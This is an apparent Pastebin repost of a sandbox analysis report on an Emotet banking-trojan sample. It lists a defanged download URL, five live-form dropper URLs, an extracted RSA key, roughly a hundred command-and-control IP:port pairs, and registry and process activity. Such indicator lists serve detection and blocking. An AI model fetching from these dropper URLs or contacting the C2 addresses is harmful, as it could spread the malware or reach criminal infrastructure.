API tools faq
paste
spamreports

emotet suncityefficiencytour.it/OLD-HACKED/ ☣

spamreports
Jan 6th, 2020
156
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 29.74 KB | None | 0 0
raw download clone embed print report
  1. REM See https://imgur.com/yxuUH09
  2. REM EMOTET DOWNLOADED FROM https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct
  3. REM ONLINE SINCE 18 DECEMBER
  4. REM DISCOVERED BY @Cryptolaemus1
  5. REM TRIAGE https://tria.ge/reports/200106-x2rer1qf2s/task1
  6. windows10_x64
  7.  
  8. https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
  9.  
  10. 10
  11.  MALWARE CONFIG
  12.  SIGNATURES
  13. TTP Categories3
  14. Signatures16
  15.  PROCESSES9
  16.  NETWORK
  17. TCP
  18. UDP
  19. ICMP
  20.  REPLAY MONITOR
  21. BACKEND
  22. horse2
  23.  
  24. MAX TIME KERNEL
  25. 143s
  26.  
  27. REPORTED
  28. 2020-01-06T08:01:59Z
  29.  
  30. RESOURCE
  31. win10v191014
  32.  
  33. SCORE
  34. 10
  35.  
  36. SUBMITTED
  37. 2020-01-06T07:58:52Z
  38.  
  39. TAGS
  40. trojan,banker,family:emotet
  41.  
  42. TTP
  43. T1112,T1012,T1082
  44.  
  45. Target
  46. https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
  47.  
  48. Filesize
  49. N/A
  50.  
  51. Completed
  52. 2020-01-06 10:01
  53.  
  54. Score
  55. 10
  56. /10
  57. MD5
  58. N/A
  59.  
  60. SHA1
  61. N/A
  62.  
  63. SHA256
  64. N/A
  65.  
  66. emotet trojan banker
  67. Extracted
  68. Language
  69. ps1
  70. URLs
  71. exe.dropper
  72. http://wingsingreen.com/wp-admin/ujs427/
  73.  
  74. http://wingsingreen.com/wp-admin/ujs427/
  75. exe.dropper
  76. http://nakhlmarket.com/bhbl/718727/
  77.  
  78. http://nakhlmarket.com/bhbl/718727/
  79. exe.dropper
  80. https://josesmexicanfoodinc.com/inquire/o415773/
  81.  
  82. https://josesmexicanfoodinc.com/inquire/o415773/
  83. exe.dropper
  84. http://stonearyan.com/flashchat/0cnsb31/
  85.  
  86. http://stonearyan.com/flashchat/0cnsb31/
  87. exe.dropper
  88. https://mustakhalf.com/a5lgi/h58a6u0435/
  89.  
  90. https://mustakhalf.com/a5lgi/h58a6u0435/
  91. Extracted
  92. Family
  93. emotet
  94. rsa_pubkey.plain
  95. -----BEGIN PUBLIC KEY-----
  96. MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua
  97. j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v
  98. fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB
  99. -----END PUBLIC KEY-----
  100. C2
  101. 68.187.160.28:443
  102.  
  103. 68.187.160.28:443
  104. 97.120.32.227:80
  105.  
  106. 97.120.32.227:80
  107. 187.188.166.192:8080
  108.  
  109. 187.188.166.192:8080
  110. 144.217.117.207:8080
  111.  
  112. 144.217.117.207:8080
  113. 96.126.121.64:443
  114.  
  115. 96.126.121.64:443
  116. 104.236.137.72:8080
  117.  
  118. 104.236.137.72:8080
  119. 85.234.143.94:8080
  120.  
  121. 85.234.143.94:8080
  122. 68.174.15.223:80
  123.  
  124. 68.174.15.223:80
  125. 63.246.252.234:80
  126.  
  127. 63.246.252.234:80
  128. 93.148.252.90:80
  129.  
  130. 93.148.252.90:80
  131. 74.59.187.94:80
  132.  
  133. 74.59.187.94:80
  134. 185.160.212.3:80
  135.  
  136. 185.160.212.3:80
  137. 46.28.111.142:7080
  138.  
  139. 46.28.111.142:7080
  140. 183.99.239.141:80
  141.  
  142. 183.99.239.141:80
  143. 68.129.203.162:443
  144.  
  145. 68.129.203.162:443
  146. 144.139.56.105:80
  147.  
  148. 144.139.56.105:80
  149. 191.183.21.190:80
  150.  
  151. 191.183.21.190:80
  152. 81.157.234.90:8080
  153.  
  154. 81.157.234.90:8080
  155. 138.68.106.4:7080
  156.  
  157. 138.68.106.4:7080
  158. 203.130.0.69:80
  159.  
  160. 203.130.0.69:80
  161. 181.36.42.205:443
  162.  
  163. 181.36.42.205:443
  164. 190.97.30.167:990
  165.  
  166. 190.97.30.167:990
  167. 94.200.114.162:80
  168.  
  169. 94.200.114.162:80
  170. 149.62.173.247:8080
  171.  
  172. 149.62.173.247:8080
  173. 188.216.24.204:80
  174.  
  175. 188.216.24.204:80
  176. 85.152.208.146:80
  177.  
  178. 85.152.208.146:80
  179. 116.48.138.115:80
  180.  
  181. 116.48.138.115:80
  182. 50.28.51.143:8080
  183.  
  184. 50.28.51.143:8080
  185. 190.210.184.138:995
  186.  
  187. 190.210.184.138:995
  188. 83.165.78.227:80
  189.  
  190. 83.165.78.227:80
  191. 68.183.170.114:8080
  192.  
  193. 68.183.170.114:8080
  194. 186.15.83.52:8080
  195.  
  196. 186.15.83.52:8080
  197. 93.67.154.252:443
  198.  
  199. 93.67.154.252:443
  200. 74.79.103.55:80
  201.  
  202. 74.79.103.55:80
  203. 152.170.108.99:443
  204.  
  205. 152.170.108.99:443
  206. 111.125.71.22:8080
  207.  
  208. 111.125.71.22:8080
  209. 68.183.190.199:8080
  210.  
  211. 68.183.190.199:8080
  212. 93.144.226.57:80
  213.  
  214. 93.144.226.57:80
  215. 82.8.232.51:80
  216.  
  217. 82.8.232.51:80
  218. 37.187.6.63:8080
  219.  
  220. 37.187.6.63:8080
  221. 200.58.83.179:80
  222.  
  223. 200.58.83.179:80
  224. 217.199.160.224:8080
  225.  
  226. 217.199.160.224:8080
  227. 86.42.166.147:80
  228.  
  229. 86.42.166.147:80
  230. 91.74.175.46:80
  231.  
  232. 91.74.175.46:80
  233. 97.81.12.153:80
  234.  
  235. 97.81.12.153:80
  236. 125.99.61.162:7080
  237.  
  238. 125.99.61.162:7080
  239. 207.154.204.40:8080
  240.  
  241. 207.154.204.40:8080
  242. 14.160.93.230:80
  243.  
  244. 14.160.93.230:80
  245. 87.106.77.40:7080
  246.  
  247. 87.106.77.40:7080
  248. 109.169.86.13:8080
  249.  
  250. 109.169.86.13:8080
  251. 91.205.215.57:7080
  252.  
  253. 91.205.215.57:7080
  254. 82.196.15.205:8080
  255.  
  256. 82.196.15.205:8080
  257. 96.61.113.203:80
  258.  
  259. 96.61.113.203:80
  260. 181.198.203.45:443
  261.  
  262. 181.198.203.45:443
  263. 130.204.247.253:80
  264.  
  265. 130.204.247.253:80
  266. 5.88.27.67:8080
  267.  
  268. 5.88.27.67:8080
  269. 82.36.103.14:80
  270.  
  271. 82.36.103.14:80
  272. 2.45.112.134:80
  273.  
  274. 2.45.112.134:80
  275. 190.6.193.152:8080
  276.  
  277. 190.6.193.152:8080
  278. 63.248.198.8:80
  279.  
  280. 63.248.198.8:80
  281. 51.255.165.160:8080
  282.  
  283. 51.255.165.160:8080
  284. 189.19.81.181:443
  285.  
  286. 189.19.81.181:443
  287. 186.68.48.204:443
  288.  
  289. 186.68.48.204:443
  290. 2.44.167.52:80
  291.  
  292. 2.44.167.52:80
  293. 163.172.40.218:7080
  294.  
  295. 163.172.40.218:7080
  296. 201.213.32.59:80
  297.  
  298. 201.213.32.59:80
  299. 151.237.36.220:80
  300.  
  301. 151.237.36.220:80
  302. 77.55.211.77:8080
  303.  
  304. 77.55.211.77:8080
  305. 37.183.121.32:80
  306.  
  307. 37.183.121.32:80
  308. 112.218.134.227:80
  309.  
  310. 112.218.134.227:80
  311. 77.27.221.24:443
  312.  
  313. 77.27.221.24:443
  314. 190.186.164.23:80
  315.  
  316. 190.186.164.23:80
  317. 175.114.178.83:443
  318.  
  319. 175.114.178.83:443
  320. 45.50.177.164:80
  321.  
  322. 45.50.177.164:80
  323. 87.106.46.107:8080
  324.  
  325. 87.106.46.107:8080
  326. 91.204.163.19:8090
  327.  
  328. 91.204.163.19:8090
  329. 188.135.15.49:80
  330.  
  331. 188.135.15.49:80
  332. 190.195.129.227:8090
  333.  
  334. 190.195.129.227:8090
  335. 159.203.204.126:8080
  336.  
  337. 159.203.204.126:8080
  338. 104.131.58.132:8080
  339.  
  340. 104.131.58.132:8080
  341. 185.86.148.222:8080
  342.  
  343. 185.86.148.222:8080
  344. 46.101.212.195:8080
  345.  
  346. 46.101.212.195:8080
  347. 223.255.148.134:80
  348.  
  349. 223.255.148.134:80
  350. 79.7.114.1:80
  351.  
  352. 79.7.114.1:80
  353. 80.11.158.65:8080
  354.  
  355. 80.11.158.65:8080
  356. 190.100.153.162:443
  357.  
  358. 190.100.153.162:443
  359. 203.25.159.3:8080
  360.  
  361. 203.25.159.3:8080
  362. 2.139.158.136:443
  363.  
  364. 2.139.158.136:443
  365. 72.29.55.174:80
  366.  
  367. 72.29.55.174:80
  368. 73.60.8.210:80
  369.  
  370. 73.60.8.210:80
  371. 37.211.49.127:80
  372.  
  373. 37.211.49.127:80
  374. 212.71.237.140:8080
  375.  
  376. 212.71.237.140:8080
  377. 5.196.35.138:7080
  378.  
  379. 5.196.35.138:7080
  380. 185.160.229.26:80
  381.  
  382. 185.160.229.26:80
  383. 91.83.93.124:7080
  384.  
  385. 91.83.93.124:7080
  386. 69.163.33.84:8080
  387.  
  388. 69.163.33.84:8080
  389. 45.8.136.201:80
  390.  
  391. 45.8.136.201:80
  392. 83.248.141.198:80
  393.  
  394. 83.248.141.198:80
  395. 200.119.11.118:443
  396.  
  397. 200.119.11.118:443
  398. 219.75.66.103:80
  399.  
  400. 219.75.66.103:80
  401. 118.36.70.245:80
  402.  
  403. 118.36.70.245:80
  404. 192.241.146.84:8080
  405.  
  406. 192.241.146.84:8080
  407. 45.79.95.107:443
  408.  
  409. 45.79.95.107:443
  410. 116.48.148.32:80
  411.  
  412. 116.48.148.32:80
  413. 62.75.160.178:8080
  414.  
  415. 62.75.160.178:8080
  416. 142.127.57.63:8080
  417.  
  418. 142.127.57.63:8080
  419. 62.75.143.100:7080
  420.  
  421. 62.75.143.100:7080
  422. 119.59.124.163:8080
  423.  
  424. 119.59.124.163:8080
  425. 181.61.143.177:80
  426.  
  427. 181.61.143.177:80
  428. 200.124.225.32:80
  429.  
  430. 200.124.225.32:80
  431. 5.32.41.106:80
  432.  
  433. 5.32.41.106:80
  434. 37.120.185.153:443
  435.  
  436. 37.120.185.153:443
  437. 96.38.234.10:80
  438.  
  439. 96.38.234.10:80
  440. 110.170.65.146:80
  441.  
  442. 110.170.65.146:80
  443. 190.146.131.105:8080
  444.  
  445. 190.146.131.105:8080
  446. 2.42.173.240:80
  447.  
  448. 2.42.173.240:80
  449. 191.103.76.34:443
  450.  
  451. 191.103.76.34:443
  452. 91.117.83.59:80
  453.  
  454. 91.117.83.59:80
  455. 58.171.38.26:80
  456.  
  457. 58.171.38.26:80
  458. 178.79.163.131:8080
  459.  
  460. 178.79.163.131:8080
  461. 113.61.76.239:80
  462.  
  463. 113.61.76.239:80
  464. 99.252.27.6:80
  465.  
  466. 99.252.27.6:80
  467. 139.162.118.88:8080
  468.  
  469. 139.162.118.88:8080
  470. 165.228.195.93:80
  471.  
  472. 165.228.195.93:80
  473. 212.237.50.61:8080
  474.  
  475. 212.237.50.61:8080
  476. 142.93.114.137:8080
  477.  
  478. 142.93.114.137:8080
  479. Defense Evasion
  480.  
  481. Discovery
  482.   Process spawned unexpected child process
  483. WINWORD.EXE
  484. Powershell.exe
  485. Reported IOC
  486. WINWORD.EXE
  487. Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
  488. Reported IOC
  489. Powershell.exe
  490. Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  491.   Emotet
  492.   Executes dropped EXE
  493. 25.exe
  494. 25.exe
  495. acquiretexas.exe
  496. acquiretexas.exe
  497.   Drops file in System32 directory
  498. 25.exe
  499. acquiretexas.exe
  500. Reported IOC
  501. 25.exe
  502. C:\Users\Admin\25.exe => C:\Windows\SysWOW64\acquiretexas.exe   File renamed
  503. Reported IOC
  504. acquiretexas.exe
  505. C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat    File opened for modification
  506. C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5  File opened for modification
  507. C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE   File opened for modification
  508. C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies    File opened for modification
  509. C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5    File opened for modification
  510.   Suspicious use of SetWindowsHookEx
  511. iexplore.exe
  512. IEXPLORE.EXE
  513. WINWORD.EXE
  514. WINWORD.EXE
  515. 25.exe
  516. 25.exe
  517. acquiretexas.exe
  518. acquiretexas.exe
  519.   Checks processor information in registry
  520. Matched TTPs
  521. Query Registry
  522. System Information Discovery
  523. Reported IOC
  524. Process #undefined
  525. \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0    Key opened
  526. \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz   Key value queried
  527.   Enumerates system info in registry
  528. Matched TTPs
  529. Query Registry
  530. System Information Discovery
  531. Reported IOC
  532. Process #undefined
  533. \REGISTRY\MACHINE\Hardware\Description\System\BIOS  Key opened
  534. \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried
  535. \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU    Key value queried
  536.   Suspicious use of FindShellTrayWindow
  537. iexplore.exe
  538.   Suspicious behavior: AddClipboardFormatListener
  539. WINWORD.EXE
  540. WINWORD.EXE
  541.   Modifies registry class
  542. Reported IOC
  543. Process #undefined
  544. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents"   Set value (str)
  545. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000fdddd5f8bc85d501123bfafabc85d50106eeebfabc85d50114000000  Set value (data)
  546. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"   Set value (str)
  547. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"   Set value (int)
  548. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (int)
  549. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"   Set value (int)
  550. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000   Set value (data)
  551. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000    Set value (data)
  552. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000    Set value (data)
  553. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02  Set value (data)
  554. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000  Set value (data)
  555. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"  Set value (int)
  556. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff  Set value (data)
  557. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\STORAGE\OICE_16_974FA576_32C1D314_18E5\CHILDREN  Key deleted
  558. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff    Set value (data)
  559. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000   Set value (data)
  560. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"   Set value (int)
  561. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"   Set value (str)
  562. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_18e5   Key deleted
  563. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff  Set value (data)
  564. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202    Set value (data)
  565. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202  Set value (data)
  566. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff    Set value (data)
  567. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" Set value (str)
  568. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\Moniker = "oice_16_974fa576_32c1d314_18e5" Set value (str)
  569. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"    Set value (int)
  570. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"  Set value (int)
  571. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff    Set value (data)
  572. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" Set value (int)
  573. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"   Set value (int)
  574. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"   Set value (str)
  575. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"    Set value (int)
  576. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff  Set value (data)
  577. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" Set value (int)
  578. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"  Set value (int)
  579. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"  Set value (int)
  580. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599    Key deleted
  581. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\MAPPINGS\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\CHILDREN   Key deleted
  582. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff    Set value (data)
  583. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3"  Set value (int)
  584. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000    Set value (data)
  585. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"    Set value (int)
  586. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Set value (int)
  587. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"  Set value (int)
  588. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\DisplayName = "OICE_16_974FA576_32C1D314_18E5" Set value (str)
  589. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"    Set value (int)
  590.   NTFS ADS
  591. WINWORD.EXE
  592. Reported IOC
  593. WINWORD.EXE
  594. C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_18e5\AC\Temp\9EFEC9F0.doc:Zone.Identifier   File opened for modification
  595.   Suspicious behavior: EmotetMutantsSpam
  596. 25.exe
  597. acquiretexas.exe
  598.   Modifies Internet Explorer settings
  599. Matched TTPs
  600. Modify Registry
  601. Reported IOC
  602. Process #undefined
  603. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" Set value (int)
  604. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"    Set value (str)
  605. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"    Set value (int)
  606. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c36c9cdac63c12448d84f1a7215689fa0000000002000000000010660000000100002000000012fa5f18d6865b700e027c6fb28203d32ffe030aa5f012bdf468f23ec71e5926000000000e80000000020000200000000b50af3b8eefc5ab870190c0bf2e78599d3ad018f30ce496a9651433821817e82000000044ef929d7727f7f528df008ae06912ff51e03023c24fa434d355e5498fac5ba640000000378bfa167c3f831822c437c4ba86f4b965b49dc29494a63b1d09d137270fb00f37667b3cfdf0166ebf6207954233df4b4420bb2a69e0499bb6fce9cf064d2d1f   Set value (data)
  607. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30786671"    Set value (int)
  608. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "285066144" Set value (int)
  609. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"    Set value (int)
  610. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D748E002-3062-11EA-BD7F-FAC4F462FE6F} = "0" Set value (int)
  611. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000  Set value (data)
  612. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLs\url2 = "http://go.microsoft.com/fwlink/p/?LinkId=255141"    Set value (str)
  613. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"  Set value (int)
  614. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2887302262"   Set value (int)
  615. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30786671"    Set value (int)
  616. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url1 = 5d2542a46fc4d501 Set value (data)
  617. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url2 = 0000000000000000 Set value (data)
  618. \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f04f6fa46fc4d501    Set value (data)
